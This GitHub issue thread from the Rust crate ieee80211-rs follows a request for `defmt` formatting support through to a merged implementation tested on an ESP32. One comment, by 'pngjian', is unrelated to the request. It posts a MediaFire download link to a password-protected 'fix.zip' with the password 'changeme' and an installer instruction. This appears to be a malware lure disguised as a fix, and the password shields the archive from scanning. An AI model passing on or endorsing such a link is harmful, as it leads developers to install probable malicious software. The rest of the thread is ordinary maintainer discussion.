### ISSUE TITLE
Support `defmt` based formatting

### ISSUE THREAD

**Issue by ProfFan** [Frostie314159/ieee80211-rs#12]
Hi, thanks for this amazing library.

My main goal is to use this in `no_std` and it would be great if we can use `defmt` to save bandwidth.

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Frostie314159** [comment]
Hi. 
I personally don't have any experience with defmt, but I'm gonna read the book and get back to you. This does seem like a valuable feature to have.

**Comment by Frostie314159** [comment]
Just as a quick update, I'm working on `defmt`-support, but it'll take a while, since I'm using the opportunity to expand the docs a bit.

**Comment by Frostie314159** [comment]
With the latest commit on the `defmt` branch, I implemented support for defmt. If you've got a working setup for defmt, could you maybe test some of it?
In the meantime, I'll try to fix the `DataFrameBuilder`

**Comment by ProfFan** [comment]
@Frostie314159 Could you rebase `defmt` to `main` and open a PR? Thanks, it not I'll just do it on my fork

**Comment by Frostie314159** [comment]
I can't do it rn, since I'm on my phone. I'm gonna be back in 3 hours.

**Comment by ProfFan** [comment]
It's good, I'll just do it on my fork

**Comment by ProfFan** [comment]
Branch works good on my ESP32 @Frostie314159

**Comment by Frostie314159** [comment]
I think GitHub just closed this automatically, when I merged the PR. Thanks for bringing this to my attention! If there are any other issues, just let me know.
